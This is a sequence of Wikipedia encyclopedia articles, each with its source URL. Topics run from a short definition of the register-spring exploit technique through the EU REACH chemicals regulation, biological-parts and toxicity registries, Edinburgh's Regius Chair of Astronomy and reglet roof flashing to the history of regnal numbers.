In computer security , a register spring is a sort of trampoline . It is a bogus return pointer or Structured Exception Handling (SEH) pointer which an exploit places on the call stack , directing control flow to existing code (within a dynamic-link library (DLL) or the static program binary). This target code in turn consists of a call or jump such as "CALL EBX" or "JMP ESP", where the appropriate processor register was previously prepared by the exploit to point to where the payload code begins. | https://en.wikipedia.org/wiki/Register_spring |
Registration, Evaluation, Authorisation and Restriction of Chemicals ( REACH ) is a European Union regulation dating from 18 December 2006, [ 1 ] amended on 16 December 2008 by Regulation (EC) No 1272/2008. [ 2 ] REACH addresses the production and use of chemical substances , and their potential impacts on both human health and the environment. Its 849 pages took seven years to pass, and it has been described as the most complex legislation in the Union's history [ 3 ] and the most important in 20 years. [ 4 ] It is the strictest law to date regulating chemical substances and will affect industries throughout the world. [ 5 ] REACH entered into force on 1 June 2007, with a phased implementation over the next decade. The regulation also established the European Chemicals Agency , which manages the technical, scientific and administrative aspects of REACH.
When REACH is fully in force, it will require all companies manufacturing or importing chemical substances into the European Union in quantities of one tonne or more per year to register these substances with a new European Chemicals Agency (ECHA) in Telakkakatu (Helsinki) [ fi ] , Finland . Since REACH applies to some substances that are contained in objects ( articles in REACH terminology), any company importing goods into Europe could be affected. [ 5 ]
The European Chemicals Agency has set three major deadlines for registration of chemicals. In general these are determined by tonnage manufactured or imported, with 1000 tonnes/a. being required to be registered by 1 December 2010, 100 tonnes/a. by 1 June 2013 and 1 tonne/a. by 1 June 2018. [ 6 ] In addition, chemicals of higher concern or toxicity also have to meet the 2010 deadline.
About 143,000 chemical substances marketed in the European Union were pre-registered by the 1 December 2008 deadline. Although pre-registering was not mandatory, it allows potential registrants much more time before they have to fully register. Supply of substances to the European market which have not been pre-registered or registered is illegal (known in REACH as "no data, no market").
REACH also addresses the continued use of chemical substances of very high concern (SVHC) because of their potential negative impacts on human health or the environment. From 1 June 2011, the European Chemicals Agency must be notified of the presence of SVHCs in articles if the total quantity used is more than one tonne per year and the SVHC is present at more than 0.1% of the mass of the object. Some uses of SVHCs may be subject to prior authorisation from the European Chemicals Agency, and applicants for authorisation will have to include plans to replace the use of the SVHC with a safer alternative (or, if no safer alternative exists, the applicant must work to find one) – known as substitution . As of 23 July 2021 [update] , there were 219 SVHCs on the candidate list for authorization. [ 7 ]
REACH applies to all chemicals imported or produced in the EU. The European Chemicals Agency will manage the technical, scientific and administrative aspects of the REACH system.
To somewhat simplify the registration of the 143,000 substances and to limit vertebrate animal testing as far as possible, substance information exchange forums (SIEFs) are formed amongst legal entities (such as manufacturers, importers, and data holders) who are dealing with the same substance. [ 8 ] This allows them to join forces and finances to create 1 registration dossier. However, this creates a series of new problems as a SIEF is the cooperation between sometimes a thousand legal entities that did not know each other at all before but suddenly must:
in order to complete a several thousand end points dossier in a limited time.
The European Commission supports businesses affected by REACH by handing out – free of charge – a software application ( IUCLID ) that simplifies capturing, managing, and submitting data on chemical properties and effects. Such submission is a mandatory part of the registration process . Under certain circumstances the performance of a chemical safety assessment (CSA) is mandatory and a chemical safety report (CSR) assuring the safe use of the substance has to be submitted with the dossier. Dossier submission is done using the web-based software REACH-IT .
The aim of REACH is to improve the protection of human health and the environment by identification of the intrinsic properties of chemical substances. At the same time, innovative capability and competitiveness of the EU chemicals industry should be enhanced. [ 9 ]
The European Commission's (EC) White Paper of 2001 on a 'future chemical strategy' proposed a system that requires chemicals manufactured in quantities of greater than 1 tonne to be 'registered', those manufactured in quantities greater than 100 tonnes to be 'evaluated', and certain substances of high concern (for example carcinogenic, mutagenic and toxic to reproduction – CMRs) to be 'authorised'.
The EC adopted its proposal for a new scheme to manage the manufacture, importation and supply of chemicals in Europe on in October 2003. This proposal eventually became law once the European Parliament officially approved its final text of REACH. It came into force on 1 June 2007. [ 10 ]
One of the major elements of the REACH regulation is the requirement to communicate information on chemicals up and down the supply chain . This ensures that manufacturers, importers, and also their customers are aware of information relating to health and safety of the products supplied. For many retailers the obligation to provide information about substances in their products within 45 days of receipt of a request from a consumer is particularly challenging. Having detailed information on the substances present in their products will allow retailers to work with the manufacturing base to substitute or remove potentially harmful substances from products. The list of harmful substances is continuously growing and requires organizations to constantly monitor any announcements and additions to the REACH scope. This can be done on the European Chemicals Agency 's website.
A requirement is to collect, collate and submit data to the European Chemicals Agency (ECHA) on the hazardous properties of all substances (except Polymers and non-isolated intermediates) manufactured or imported into the EU in quantities above 1 tonne per year. Certain substances of high concern, such as carcinogenic, mutagenic and reproductive toxic substances (CMRs) will have to be authorised.
Chemicals will be registered in three phases according to the tonnage of the substance evaluation:
More than 1000 tonnes a year, or substances of highest concern, must be registered in the first 3 years;
100–1000 tonnes a year must be registered in the first 6 years;
1–100 tonnes a year must be registered in the first 11 years.
In addition, industry should prepare risk assessments and provide controls measures for using the substance safely to downstream users. [ 10 ]
Evaluation provides a means for the authorities to require registrants, and in very limited cases downstream users, to provide further information.
There are two types of evaluation: dossier evaluation and substance evaluation:
Dossier evaluation is conducted by authorities to examine proposals for testing to ensure that unnecessary animal tests and costs are avoided, and to check the compliance of registration dossier with the registration requirements. Chemical companies failed to provide "important safety information" in nearly three quarters (74% or 211 of 286) of cases checked by authorities, according to the European Chemicals Agency 's 2018 annual progress report . “The numbers show a similar picture to previous years," it said. Industry group Cefic acknowledged the problem.
Substance evaluation is performed by the relevant authorities when there is a reason to suspect that a substance presents a risk to human health or the environment (e.g. because of its structural similarity to another substance). Therefore, all registration dossiers submitted for a substance are examined together and any other available information is taken into account. [ 10 ]
Substance evaluation is carried out under a programme known as the Community Rolling Action Plan ( CoRAP ). An independent review of progress by national officials published in late 2018 found that 352 substances have so far been prioritised for substance evaluation with 94 completed. For almost half the 94, officials concluded that existing commercial use of the substance is unsafe for human health and/or the environment. Risk management has been initiated for twelve substances since REACH came into force. For 74% of substances (34 out of 46), concerns were demonstrated, but no actual regulatory follow-up has yet been initiated. In addition, national officials concluded that 64% of the substances under evaluation (126 out of 196) lacked the information needed to demonstrate the safety of the chemicals marketed in Europe due to inadequate industry data.
REACH allows restricted substances of very high concern to continue being used, subject to authorisation.
This authorisation requirement attempts to ensure that risks from the use of such substances are either adequately controlled or justified by socio-economic grounds, having taken into account the available information on alternative substances or processes.
The Regulation enables restrictions of use to be introduced across the European Community where this is shown to be necessary. Member States or the Commission may prepare such proposals. [ 11 ]
By March 2019, authorisation had been granted 185 times , with no eligible request ever having been rejected. NGOs have complained that authorisations have been granted despite safer alternatives existing and that this was hindering substitution . In March 2019, the European Court of Justice revoked an authorisation in a ruling that criticised the European Chemicals Agency for failing to identify a safer alternative.
Manufactures and importers should develop risk reduction measures for all known uses of the chemical including downstream uses. Downstream users such as plastic pipe producers should provide detail of their uses to their suppliers. In cases where downstream users decide not to disclose this information, they need to have their own CSR. [ 12 ]
REACH is the product of a wide-ranging overhaul of EU chemical policy. It passed the first reading in the European Parliament on 17 November 2005, and the Council of Ministers reached a political agreement for a common position on 13 December 2005. The European Parliament approved REACH on 13 December 2006 and the Council of Ministers formally adopted it on 18 December 2006. Weighing up expenditure versus profit has always been a significant issue, with the estimated cost of compliance being around €5 billion over 11 years, and the assumed health benefits of saved billions of euro in healthcare costs. [ 13 ] However, there have been different studies on the estimated cost which vary considerably in the outcome. It came into force on 20 January 2009, and will be fully implemented by 2015.
A separate regulation – the CLP Regulation (for "Classification, Labelling, Packaging") – implements the United Nations Globally Harmonized System of Classification and Labelling of Chemicals (GHS) and will steadily replace the previous Dangerous Substances Directive and Dangerous Preparations Directive .
The REACH regulation was amended in April 2018 to include specific information requirements for nanomaterials . [ 14 ]
In the European Green Deal of 2020, a commitment was made to update the REACH regulation to ban between 7,000 and 12,000 toxic substances in all consumer products, except where truly essential. The goal was among the priorities of the European Commission , but is in danger of being radically revised due to lobbying by the EU chemical industry and the positions taken by the European People's Party . [ 15 ]
The legislation was proposed under dual reasoning: protection of human health and protection of the environment .
Using potentially toxic substances (such as phthalates or brominated flame retardants ) is deemed undesirable and REACH will force the use of certain substances to be phased out. Using potentially toxic substances in products other than those ingested by humans (such as electronic devices ) may seem to be safe, but there are several ways in which chemicals can enter the human body and the environment. Substances can leave particles during consumer use, for example into the air where they can be inhaled or ingested. Even where they might not do direct harm to humans, they can contaminate the air or water, and can enter the food chain through plants, fish or other animals. According to the European Commission, little safety information exists for 99 percent of the tens of thousands of chemicals placed on the market before 1981. [ 5 ] There were 100,106 chemicals in use in the EU in 1981, when the last survey was performed. Of these only 3,000 have been tested and over 800 are known to be carcinogenic, mutagenic or toxic to reproduction. These are listed in the Annex 1 of the Dangerous Substances Directive (now Annex VI of the CLP Regulation ).
Continued use of many toxic chemicals is sometimes justified because "at very low levels they are not a concern to health". [ 16 ] However, many of these substances may bioaccumulate in the human body, thus reaching dangerous concentrations. They may also chemically react with one another, [ 17 ] producing new substances with new risks.
A number of countries outside of the European Union have started to implement REACH regulations or are in the process of adopting such a regulatory framework to approach a more globalized system of chemicals registration under the Globally Harmonized System of Classification and Labelling of Chemicals (GHS). [ 18 ] Balkan countries such as Croatia and Serbia are in the process of adopting the EU REACH system under the auspices of the EU IPA programme. Switzerland has moved towards implementation of REACH through partial revision of the Swiss Chemical Ordinance on February 1, 2009. The new Chemicals Management Regulation in Turkey is paving the way for the planned adoption of REACH in 2013. China has moved towards a more efficient and coherent system for the control of chemicals in compliance with GHS.
In the UK, the government announced a "UK REACH" that the UK's Chemical Industry Association described as a "hugely expensive duplication" of the EU's safety data. [ 19 ] The new regulations were to be enforced from October 2021 but deferred to October 2023, and then to October 2025. Following industry representations, the responsible Minister announced "that officials would now explore 'a new model' for UK REACH registrations that would look to 'reduce the need for replicating EU Reach data packages'". [ 19 ] In March 2021, a group of more than 20 leading UK organisations, including the CHEM Trust and Breast Cancer UK, "rejected industry proposals to streamline UK Reach as a 'major weakening' of the envisaged post-Brexit regime". [ 19 ]
Over a decade after REACH came into force, progress has been slow. Of the 100,000 chemicals used in Europe today, “only a small fraction has been thoroughly evaluated by authorities regarding their health and environmental properties and impacts, and even fewer are actually regulated,” according to a report for the European Commission.
Apart from the potential costs to industry and the complexity of the new law, REACH has also attracted concern because of animal testing . Animal tests on vertebrates are now required but allowed only once per each new substance and if suitable alternatives cannot be used. If a company pays for such tests, it must sell the rights of the results for a "reasonable" price, which is not defined. There are additional concerns that access to the necessary information may prove very costly for potential registrants needing to purchase it.
On 8 June 2006, the REACH proposal was criticized by non-EU countries, including the United States, India and Brazil , which stated that the bill would hamper global trade. [ 20 ]
The cosmetics company Lush were critical of the legislation when it was first proposed in 2006, as they believed it would increase animal testing . The cosmetics company wrote to its European customers and also ran an in-store marketing campaign, asking for postcards objecting to the legislation be sent to MEPs , a move which resulted in 80,000 Lush customers sending postcards. [ 21 ] In December 2006, Lush protested outside the European Parliament in Strasbourg , by dumping horse manure outside the building. [ 22 ]
An opinion in Nature in 2009 by Thomas Hartung and Constanza Rovida estimated that 54 million vertebrate animals would be used under REACH and that the costs would amount to €9.5 billion, set against the annual European industry annual turnover of €507 billion. [ 23 ] Hartung is the former head of European Centre for the Validation of Alternative Methods (ECVAM). [ citation needed ] In a news release, ECHA criticised assumptions made by Hartung and Rovida; ECHA's alternative assumptions reduced sixfold the number of animals. [ 24 ]
Only representatives are EU-based entities that must comply with REACH (Article 8) and should operate standard, transparent working practices. The Only Representative assumes responsibility and liability for fulfilling obligations of importers in accordance with REACH for substances being brought into the EU by a non-EU manufacturer.
Non-EU consultancies offer "only representative" services, though according to REACH it is not possible to register a substance if your "only representative" consultancy company is not based in the EU, unless it is subcontracted to an EU-based registrant.
The SIEFs will bring new challenges. An article in the business news service Chemical Watch described how some "pre-registrants" may simply be consultants hoping for work ("gold diggers") while others may be aiming to charge exorbitant rates for the data they have to offer ("jackals"). [ 25 ]
Source: [ 26 ]
The European Chemical Agency (ECHA) has published the REACH Authorisation List, [ 28 ] in an effort to tighten the use of Substances of Very High Concern (SVHCs). The list is an official recommendation from the ECHA to the European Commission . The list is also regularly updated and expanded. Currently the Candidate List for Authorisation comprises a total of 233 SVHCs (see ECHA list at https://echa.europa.eu/candidate-list-table ), some of which are already active on the Authorization List.
To sell or use these substances, manufacturers, importers, and retailers in the European Union (EU) must apply for authorization from the ECHA . The applicant is to submit a chemical safety report on the risks entailed by the substance, as well as an analysis of possible alternative substances or technologies including present and future research and development processed. | https://en.wikipedia.org/wiki/Registration,_Evaluation,_Authorisation_and_Restriction_of_Chemicals |
The Registry of Standard Biological Parts is a collection of genetic parts that are used in the assembly of systems and devices in synthetic biology . The registry was founded in 2003 at the Massachusetts Institute of Technology . The registry, as of 2018, contains over 20,000 parts. Recipients of the genetic parts include academic labs, established scientists, and student teams participating in the iGEM Foundation 's annual synthetic biology competition. [ 1 ]
The Registry of Standard Biological Parts conforms to the BioBrick standard, a standard for interchangeable genetic parts. BioBrick was developed by a nonprofit composed of researchers from MIT , Harvard , and UCSF . The registry offers genetic parts with the expectation that recipients will contribute data and new parts to improve the resource. The registry records and indexes biological parts and offers services including the synthesis and assembly of biological parts, systems, and devices.
The registry offers many types of biological parts, including DNA , plasmids , plasmid backbones, primers , promoters , protein coding sequences, protein domains , ribosomal binding sites , terminators , translational units, riboregulators , and composite parts. [ 2 ] It also includes devices such as protein generators, reporters , inverters , receptors , senders, and measurement devices. A key idea that motivated the development of the Registry was to develop an abstraction hierarchy implemented through the parts categorization system. [ 3 ]
The registry has previously received external funding through grants from the National Science Foundation , the Defense Advanced Research Projects Agency , and the National Institutes of Health . | https://en.wikipedia.org/wiki/Registry_of_Standard_Biological_Parts |
Registry of Toxic Effects of Chemical Substances ( RTECS ) is a database of toxicity information compiled from the open scientific literature without reference to the validity or usefulness of the studies reported. Until 2001 it was maintained by US National Institute for Occupational Safety and Health (NIOSH) as a freely available publication. It is now maintained by the private company BIOVIA . [ 1 ]
Six types of toxicity data are included in the file: [ 2 ]
Specific numeric toxicity values such as LD 50 , LC 50 , TDLo , and TCLo are noted as well as species studied and the route of administration used. For all data the bibliographic source is listed. The studies are not evaluated in any way.
RTECS was an activity mandated by the US Congress , established by Section 20(a)(6) of the Occupational Safety and Health Act of 1970 (PL 91-596). [ 3 ] The original edition, known as the Toxic Substances List was published on June 28, 1971, and included toxicological data for approximately 5,000 chemicals . The name changed later to its current name Registry of Toxic Effects of Chemical Substances . [ 4 ] In 2000, NIOSH solicited proposals to transfer the RTECS trademark and database to a private company, [ 4 ] and in December 2001 RTECS was transferred from NIOSH to the private company MDL , a subsidiary of Elsevier . [ 5 ] Through a series of acquisitions and mergers, Dassault Systèmes acquired the database and, as of 2025, licenses RTECS through its BIOVIA brand.
RTECS is also available through 3rd party distributors like the Canadian Centre for Occupational Health and safety which sells licenses for English and French versions of RTECS. [ 6 ] | https://en.wikipedia.org/wiki/Registry_of_Toxic_Effects_of_Chemical_Substances |
The Regius Chair of Astronomy is one of eight Regius Professorships at the University of Edinburgh , and was founded in 1785. Regius Professorships are those that have in the past been established by the British Crown , and are still formally appointed by the current monarch, although they are advertised and recruited by the relevant university following the normal processes for appointing a professorship.
The Regius Chair of Astronomy in Edinburgh is unusual because of its relationship with the position of the Astronomer Royal for Scotland , and the Royal Observatory Edinburgh (ROE) . Between 1834 and 1990, the Regius Professor at the University, the Astronomer Royal, and the Director of the Royal Observatory were all the same person. This is no longer true however, as explained under "New Structure" below.
Astronomy was originally taught in Edinburgh by the Chairs of Mathematics and of Natural Philosophy. [ 1 ] [ 2 ] A Chair of Practical Astronomy was established in 1785 by a Royal Warrant signed by George III. The first holder was Robert Blair , who held the position until his death in 1828. However, he was never provided with an observatory or any instruments, and refused to do any teaching, seeing the position as a sinecure. [ 3 ] At that time, the Royal Commission was reviewing Scottish Universities and recommended that the chair should not be filled 'until a suitable observatory... could be established' [ 3 ]
Meanwhile, outside the University, the Edinburgh Astronomical Institution , a club of private individuals, had succeeded in building an observatory on Calton Hill in a new building designed by William Playfair . In 1822 the Institution presented a loyal address to George IV, resulting in the observatory being granted the title of Royal Observatory. After considerable delay and negotiation, in 1834 Thomas Henderson was appointed as both the first Astronomer Royal for Scotland and the second Regius Professor. He remained in both positions until he died in 1844. Thomas Henderson's main claim to fame is being, along with Friedrich Bessel , the first astronomer to measure the parallax of a star , and hence a reliable stellar distance. He made his measurements at the Cape of Good Hope and reduced the data after taking up his position in Edinburgh. [ 3 ]
In 1846 Charles Piazzi Smyth became Regius Professor and Astronomer Royal, and held both positions until he retired in 1888. He was the first Regius Professor to actually provide lectures in Astronomy, sixty five years after the founding of the chair. [ 2 ] Piazzi Smyth had a long and full career, including the establishment of a public time service via the Time Ball and the One O'Clock Gun, the exploration of the idea of mountain top astronomy, the investigation of the spectra of the Sun, the Zodiac and the Aurora, and innovative developments in photography. [ 4 ] Later in his life he became obsessed with mystical interpretations of the Pyramids.
Following the retirement of Piazzi Smyth, both the future of the Royal Observatory and the Regius Professorship were once again thrown into uncertainty by a Royal Commission on Scottish Universities, until the generous gift of Lord Lindsay led to the creation of a new Royal Observatory building on Blackford Hill (see [ 3 ] for extensive detail), and Ralph Copeland was appointed as fourth Regius Professor and third Astronomer Royal. Copeland was well known for spectroscopic observations of planets, comets, and nebulae, and was the first person to observe Helium outside the Sun. He also carried out extensive travel, both to observe transits of Venus, and to continue Piazzi Smyth's researches into mountain top astronomy.
Copeland died in 1905 and was replaced both as Regius Professor and as Astronomer Royal by Frank Dyson . He was the first Regius Professor whose title was simply "Chair of Astronomy" rather than "Chair of Practical Astronomy". He investigated the spectrum of the solar corona and chromosphere. In 1910 he left to become Director of the Royal Greenwich Observatory and (English) Astronomer Royal - the only astronomer to have held both Astronomer Royal positions. He later became famous for organising eclipse expeditions which helped to proved Einstein's General Relativity Theory, and for instigating the transmission of the "pips" from the Greenwich Observatory to the BBC.
In 1910 Dyson was replaced by Ralph Sampson . Before coming to Edinburgh Sampson was well known for pioneering work on the colour temperature of stars, and a theory of the motions of the Galilean satellites. After his appointment, his work took a very practical turn, aiming at producing a more accurate time service, improving the optical performance of telescopes, and developing a recording microphotometer and techniques for performing spectrophotometry of stars. He also led the construction of 36inch telescope which still sits in the East Tower of the ROE. Sampson retired in 1937, to be replaced by W.M.H. Greaves in 1938. Greaves kept the national time service going the war, and led extensive work on determining the temperatures of stars, and the physical properties of their atmospheres, using spectrophotometry, as well as studies of the effect of sunspots in terrestrial magnetism. He died suddenly in 1955, and was replaced as both Regius Professor and Astronomer Royal by Hermann Bruck .
During the 1960s and 1970s, the ROE underwent considerable expansion, so that technical and scientific contributions are properly seen as due to a whole community. Nonetheless, it is possible to discern clear themes in the leadership of successive astronomers.
Hermann Bruck was the most important historical figure for Edinburgh astronomy, at least in leadership terms. When he arrived in 1957 the observatory had six scientific staff. By the time he retired in 1975, there over a hundred, and the observatory was established as a major international centre. There were three main themes to his leadership. The first, together with his wife Mary Bruck (nee Conway) was the creation of the first full Astrophysics degree, and the expansion of first year astronomy teaching to large classes of students from many disciplines. The second theme was automation - both computerised data reduction, and the creation of automated measuring machines, which led to a sequence of machines which scanned and digitised photographic plates - GALAXY, COSMOS, and SuperCOSMOS. The third theme was the development of mountaintop overseas observatories, fulfilling the dreams of Piazzi-Smyth. This work began with the creation of a station at Monte Porzio in Italy, followed by the design of a Northern Hemisphere Observatory in La Palma (which was then implemented by the Royal Greenwich Observatory), the building and operation of the UK Schmidt Telescope in Australia, and finally the building and operation of the infra-red specialised UK Infrared Telescope ( UKIRT ) in Hawaii. Bruck retired in 1975.
The next holder of both the Regius Professorship and the Astronomer Royal position was Vincent Reddish , who had been at ROE since the 1960s, and in fact was to a large extent responsible for many of the advances in the Bruck era - automation, systematic sky surveys, and the creation of the UK Schmidt Telescope and UKIRT . He resigned in 1978 and concentrated on his controversial private researches into dowsing .
Malcolm Longair was appointed to the joint position in 1980, and continued the trends started by Bruck and Reddish of making the Royal Observatory Edinburgh a centre of astronomical technology and sky survey work. Under Longair's leadership the ROE created a radical new facility, the James Clerk Maxwell Telescope ( JCMT ), and built a series of ground breaking instruments for both ground-based and space-based instruments. University leadership in Astronomy was however largely delegated to Mary Bruck and Peter Brand, under whom the Department of Astronomy merged with the Department of Physics, and was re-named the Institute for Astronomy. Longair resigned in 1990, during a difficult period of political discussion over the structure of British Astronomy, and moved to the Cavendish Laboratory in Cambridge.
Developments since 1994 here.
Here "ARn" refers to the holder also being the n'th Astronomer Royal for Scotland. In al those cases, the date of holding the Astronomer Royal position are the same as for holding the Regius chair. | https://en.wikipedia.org/wiki/Regius_Professor_of_Astronomy_(Edinburgh) |
A reglet is found on the exterior of a building along a masonry wall, chimney or parapet that meets the roof . It is a groove cut within a mortar joint that receives counter-flashing meant to cover surface flashing used to deflect water infiltration. Reglet can also refer to the counter-flashing itself when it is applied on the surface, known as "face reglet" or "reglet-flashing".
The reglet is created typically with a grinder or masonry cutting saw that cuts 3/4" to 1-1/2" deep into a mortar joint between two bricks. [ 1 ] The counter-flashing is then inserted to the reglet and held in place with thin metal wedge covered with a sealant.
A face reglet (also known as reglet-flashing) is counter-flashing that is typically made out of either copper or lead-coated copper. [ 2 ] It is applied on the surface of the wall or parapet and screwed into place, with additional sealant placed between the surface and the counter-flashing. [ 3 ] It is easily removable for roof repair and flashing replacements.
A face reglet can also be called a raggle [ 4 ] and may be related to regle , a groove.
This architecture -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Reglet |
Philosophers
Works
Regnal numbers are ordinal numbers , often written as Roman numerals , used to distinguish among persons with the same name who held the same office. Most importantly, they are used to distinguish monarchs or popes . An ordinal is the number placed after a monarch's regnal name to differentiate between a number of popes, kings, queens or princes reigning the same territory with the same regnal name.
It is common to start counting either since the beginning of the monarchy, or since the beginning of a particular line of state succession. For example, Boris III of Bulgaria and his son Simeon II were given their regnal numbers because the medieval rulers of the First and Second Bulgarian Empire were counted as well, although the recent dynasty dates only back to 1878 and is only distantly related to the monarchs of previous Bulgarian states. [ 1 ] On the other hand, the kings of England and kings of Great Britain and the United Kingdom are counted starting with the Norman Conquest . That is why the son of Henry III of England is called Edward I , even though there were three English monarchs named Edward before the Conquest (they were distinguished by epithets instead).
Sometimes legendary or fictional persons are included. For example, the Swedish kings Eric XIV (reigned 1560–68) and Charles IX (1604–11) took ordinals based on a fanciful 1544 history by Johannes Magnus , which invented six kings of each name before those accepted by later historians. [ 2 ] A list of Swedish monarchs, represented on the map of the Estates of the Swedish Crown, [ 3 ] produced by French engraver Jacques Chiquet [ fr ] (1673–1721) and published in Paris in 1719, starts with Canute I and shows Eric XIV and Charles IX as Eric IV and Charles II respectively; the only Charles holding his traditional ordinal in the list is Charles XII . Also, in the case of Emperor Menelik II of Ethiopia, he chose his regnal number with reference to a mythical ancestor and first sovereign of his country (a supposed son of biblical King Solomon ) to underline his legitimacy into the so-called Solomonic dynasty . [ 4 ]
Monarchs with the same given name are distinguished by their ordinals:
Ordinals may also apply where a ruler of one realm and a ruler of that realm's successor state share the same name:
Practice varies where monarchs go by two or more given names . For Swedish monarchs , the ordinal qualifies only the first name; for example, Gustav VI Adolf , known as "Gustav Adolf", was the sixth Gustav/Gustaf, but the third Gustav Adolf. By contrast, the Kingdom of Prussia was ruled in turn by Friedrich I , Friedrich Wilhelm I , Friedrich II , and Friedrich Wilhelm II ; and later by Wilhelm I . Likewise Pope John Paul I , who chose his double name to honour predecessors John XXIII and Paul VI , and was succeeded by John Paul II .
In any case, it is usual to count only the monarchs or heads of the family, and to number them sequentially up to the end of the dynasty. [ citation needed ] A notable exception to this rule is the German House of Reuss . This family has the particularity that every male member during the last eight centuries was named Heinrich, and all of them, not only the head of the family, were numbered. While the members of the elder branch were numbered in order of birth until the extinction of the branch in 1927, [ 5 ] the members of the younger line were (and still are) numbered in sequences that began and ended roughly as centuries began and ended. [ 6 ] This explains why the current (since 2012) head of the Reuss family is called Heinrich XIV, his late father Heinrich IV and his sons Heinrich XXIX and Heinrich V.
It is rare, but some German princely families number all males whether head of the family or not; for example, Hans Heinrich XV von Hochberg was preceded as Prince of Pless by Hans Heinrich XI and succeeded by Hans Heinrich XVII; the ordinals XII, XIII, XIV, and XVI were borne by von Hochbergs who were not Prince of Pless. Similarly for the House of Reuss , where all men were numbered Heinrichs and some were reigning Princes of Reuss-Gera or Reuss-Greiz .
Pretenders and rulers of formerly deposed dynasties are often given regnal numbers as if non-reigning pretenders had actually ruled . For example Louis XVIII of France took a regnal number that implicitly asserts that Louis XVII had been king, though he never reigned; his pretendership was during the First French Republic . A similar case is that of Napoleon III whose regnal number implicitly asserts a ruling Napoleon II . Louis XVIII numbered his regnal year from the death of Louis XVII, something Napoleon III never did.
Almost all West European monarchs and popes after medieval times have used ordinals. Ordinals are also retrospectively applied to earlier monarchs in most works of reference, at least as far as they are not easy to distinguish from each other by any other systematical means. In several cases, various sorts of "semi-regnal" members of dynasties are also numeraled, to facilitate their individuality in works of reference – in cases such as co-regents, crown princes, succession-conveying consorts , prime ministers and deputy monarchs. In the first centuries after the Middle Ages, the use was sometimes sporadic, but became established by the 18th century. In the past couple of centuries, European monarchs without an official ordinal have been rarities.
As a rule of thumb, medieval European monarchs did not use ordinals at their own time, and those who used were rarities and even their use was sporadic. Ordinals for monarchs before the 13th century are anachronisms , as are also ordinals for almost all later medieval monarchs. Still, they are often used, because they are a practical way of distinguishing between different historical monarchs who had the same name.
Popes were apparently the first to assume official ordinals for their reigns, although this occurred only in the last centuries of the Middle Ages. It is clear, from renumberings of Popes John XV–XIX and Popes Stephen II–IX, that as of the 11th century the popes did not yet use established ordinals. The official, self-confirmed numbering of John XXI means that at latest from the 13th century the popes did take official ordinals in their accession.
Emperor Frederick II , King Charles II of Naples and King Premislas II of Poland evidently used ordinals sometimes during their reign, whereas most of their contemporary monarchs did not. In the 14th century, Emperor Charles IV sometimes used that ordinal. Presumably, use of the ordinal of king Frederick III of Sicily also is contemporaneous. The royal chroniclers of the Abbey of Saint-Denis were using ordinals to refer to the French kings as early as the thirteenth century with the practise entering common usage among royalty and the nobility by the late fourteenth century. The British tradition of consistently and prevalently numbering monarchs dates back to Henry VIII and Mary I ; however, sporadic use occurred at least as early as the reign of Edward III .
The long history of the papacy has led to difficulties in some cases. For example, Stephen was only pope for three days before dying of apoplexy , and was never consecrated. Because not all list-makers count him as having been pope (as Stephen II ), there has been some confusion in regard to later popes who chose the name Stephen. Later Stephens are sometimes numbered with parentheses, e.g., his immediate successor (in name) is denoted either Stephen (II) III or Stephen III (II). The church did consider Stephen II a pope until 1960, when he was removed from the list of popes in 1961. The history of the numbering of popes taking the regnal name "John" is even more convoluted, owing to the long history of popes taking the name (a common name, chosen frequently to honour the Apostle ), bad record-keeping, and political confusion; among other results, the regnal name "John XX" is completely skipped under all reckonings.
In the case of personal unions , some monarchs have had more than one ordinal, because they had different ordinals in their different realms. For instance, Charles XV of Sweden was also king of Norway, but in Norway he went under the name Charles IV. The Swedish-Norwegian union was in force 1814–1905 and both realms had had kings called Charles before the union, but Sweden had had more kings by that name.
In the event of one kingdom achieving independence from another but retaining the same monarch, the monarch often retains the same number as was already used in the older realm. King Christian X of Denmark thus became King Christian X of Iceland when Iceland became an independent kingdom in personal union with Denmark in 1918. The same is true for Commonwealth realms , where the monarch retains the regnal number from the British line of monarchs (see below).
Beginning in 1603, when England and Scotland began to share a monarch but were still legally separate realms, their monarchs were numbered separately. The king who began the personal union was James VI of Scotland who was also James I of England, and his name is often written (especially in Scotland) as James VI and I . Similarly, his grandson is James VII and II . Mary II 's ordinal coincidentally relates to both her predecessors Mary I of England and Mary I of Scotland ; her co-sovereign husband is William III and II (here the English number is first). Charles I and Charles II had a name not used in either country before 1603.
After the realms were united with the Acts of Union 1707 , separate numbers were not needed for the next five monarchs: Anne and the four Georges. However, when William IV acceded in 1830, he was not called William III in Scotland. [ citation needed ] ( George Croly pointed out in 1830 the new king was William I, II, III, and IV: of Hanover , Ireland, Scotland, and England respectively. [ 7 ] ) Nor were Edward VII and Edward VIII known as Edward I and Edward II (or possibly II and III, if one counts the disputed reign of Edward Balliol ) of Scotland. These kings all followed the numbering consistent with the English sequence of sovereigns (which, incidentally, was also the higher of the two numbers in all occurring cases). This was not without controversy in Scotland, however; for example, Edward VII's regnal number was occasionally omitted in Scotland, even by the established Church of Scotland , in deference to protests that the previous Edwards were English kings who had "been excluded from Scotland by battle". [ 8 ]
The issue arose again with the accession of Queen Elizabeth II , as Scotland had never before had a regnant Queen Elizabeth, the previous queen of that name having been queen of England only. Objections were raised, and sustained, to the use of the royal cypher E II R anywhere in Scotland, resulting in several violent incidents, including the destruction of one of the first new E II R pillar boxes in Scotland, at Leith in late 1952. Since that time, the cipher used in Scotland on all government and Crown property and street furniture has carried no lettering, but simply the Crown of Scotland from the Honours of Scotland . A court case, MacCormick v Lord Advocate , contesting the style "Elizabeth II" within Scotland, was decided in 1953 on the grounds that the numbering of monarchs was part of the royal prerogative , and that the plaintiffs had no title to sue the Crown .
To rationalise this usage, it was suggested by Winston Churchill , the Prime Minister of the day, that in future, the higher of the two numerals from the English and Scottish sequences would always be used. [ 9 ] This had been the case de facto since the Acts of Union 1707 ; nine of the thirteen monarchs since the Act had names either never previously used in England or Scotland (Anne, six Georges, and Victoria) or used in both only after the 1603 Union of Crowns (three Charleses), which sidestepped the issue, while the English numbers for the remaining four monarchs' names have consistently been both higher and the ones used (William, two Edwards, and Elizabeth). Under the Churchill rule, if a future British monarch were to use the regnal name Alexander , even though there has never been a King of England of that regnal name, they would be Alexander IV, there having been three Kings Alexander of Scotland (reigning 1107–1124, 1214–1249, and 1249–1286).
